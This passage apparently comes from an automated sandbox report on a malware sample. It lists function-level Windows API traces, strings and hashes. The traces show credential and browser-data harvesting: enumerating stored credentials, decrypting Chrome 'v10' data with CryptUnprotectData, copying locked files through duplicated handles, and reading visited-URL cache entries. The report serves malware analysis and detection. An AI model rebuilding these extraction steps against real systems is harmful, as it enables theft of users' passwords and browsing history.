                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            • memset.MSVCRT ref: 0044573D
                                            • memset.MSVCRT ref: 00445755
                                            • memset.MSVCRT ref: 004458CB
                                            • memset.MSVCRT ref: 004458E3
                                            • memset.MSVCRT ref: 0044596E
                                            • memset.MSVCRT ref: 00445A10
                                            • memset.MSVCRT ref: 00445A28
                                            • memset.MSVCRT ref: 00445AC6
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            • memset.MSVCRT ref: 00445B52
                                            • memset.MSVCRT ref: 00445B6A
                                            • memset.MSVCRT ref: 00445C9B
                                            • memset.MSVCRT ref: 00445CB3
                                            • _wcsicmp.MSVCRT ref: 00445D56
                                            • memset.MSVCRT ref: 00445B82
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                            • memset.MSVCRT ref: 00445986
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                            • API String ID: 1963886904-3798722523
                                            • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                            • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                            • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                            • String ID: $/deleteregkey$/savelangfile
                                            • API String ID: 2744995895-28296030
                                            • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                            • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                            • wcsrchr.MSVCRT ref: 0040B738
                                            • memset.MSVCRT ref: 0040B756
                                            • memset.MSVCRT ref: 0040B7F5
                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                            • memset.MSVCRT ref: 0040B851
                                            • memset.MSVCRT ref: 0040B8CA
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                            • memset.MSVCRT ref: 0040BB53
                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                            • String ID: chp$v10
                                            • API String ID: 1297422669-2783969131
                                            • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                            • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                                            APIs
                                            • memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                            • String ID:
                                            • API String ID: 3715365532-3916222277
                                            • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                            • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                            • String ID: bhv
                                            • API String ID: 4234240956-2689659898
                                            • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                            • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2941347001-70141382
                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • wcschr.MSVCRT ref: 0040C324
                                            • wcschr.MSVCRT ref: 0040C344
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • GetLastError.KERNEL32 ref: 0040C373
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                            • String ID: visited:
                                            • API String ID: 2470578098-1702587658
                                            • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                            • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 free 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E28B
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                            • _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                            • API String ID: 2804212203-2982631422
                                            • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                            • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040BC75
                                            • memset.MSVCRT ref: 0040BC8C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                            • String ID:
                                            • API String ID: 115830560-3916222277
                                            • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                            • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError free 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 794 418506-418515 free 787->794 788->787 794->772
                                            APIs
                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                            • GetLastError.KERNEL32 ref: 0041847E
                                            • free.MSVCRT ref: 0041848B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
